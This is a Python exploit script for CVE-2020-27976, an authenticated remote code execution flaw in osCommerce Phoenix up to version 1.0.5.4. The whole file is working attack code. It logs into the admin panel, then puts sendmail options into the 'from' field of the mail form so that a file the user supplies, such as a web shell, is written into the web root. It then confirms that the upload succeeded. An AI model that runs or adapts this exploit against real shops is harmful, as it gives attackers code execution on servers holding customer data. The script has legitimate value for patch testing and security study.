exploit.py

#!/usr/bin/env python
#
# CVE-2020-27976
# Authenticated RCE in osCommerce Phoenix <=1.0.5.4
# KORNHOLIO 2020

import os
import sys
from urllib.parse import urlparse
import requests

if __name__ == "__main__":
    if len(sys.argv) != 5:
        print("Usage: ./exploit.py <url> <user> <pass> <payload>")
        exit()

    print("\n==============================")
    print("==                          ==")
    print("== I AM THE GREAT KORNHOLIO ==")
    print("==  ARE U THREATENING ME??  ==")
    print("==                          ==")
    print("==  CVE-2020-27976 Exploit  ==")
    print("==                          ==")
    print("==============================\n")

    URL = sys.argv[1]
    USER = sys.argv[2]
    PASS = sys.argv[3]
    PAYLOAD = os.path.abspath(sys.argv[4])
    BASEPATH = urlparse(URL).path

    # load payload
    print("Loading " + PAYLOAD + "...", end='')
    ptext = None

    try:
        with open(PAYLOAD, 'r') as f:
            ptext = f.read().replace('\n', ' ')
    except Exception as e:
        print(e)
        exit()
    print(" OK.")

    # init session, login
    sess = requests.Session()

    print("Authenticating...", end='')
    sess.get(URL + "/admin/")
    r = sess.post(URL + "/admin/#.php",
        params={"action": "process"},
        data={"username": USER, "password": PASS})

    if "Invalid administrator" in r.text:
        print(" authentication failed!")
        exit()
    elif "maximum number" in r.text:
        print(" maximum login attempts reached! Wait 5 minutes.")
    else:
        print(" OK.")

    # upload payload
    pname = os.path.basename(PAYLOAD)
    print("Uploading payload to " + URL + "/" + pname + "...", end='')

    fromstr = "test@localhost -OQueueDirectory=/tmp -X/var/www/html/" + BASEPATH + "/" + pname

    sess.post(URL + "/admin/mail.php",
        params={"action": "send_email_to_user"},
        data={
            "customers_email_address": "***",
            "from": fromstr,
            "subject": ptext,
            "message": "aaa"
        }
    )

    r = sess.get(URL + "/" + pname)

    if r.status_code == 404:
        print(" 404")
        print("\nUPLOAD FAILED!")
        exit()

    print(" OK.")
    print("\nUPLOAD SUCCESS!")
    print("Payload uploaded to " + URL + "/" + pname)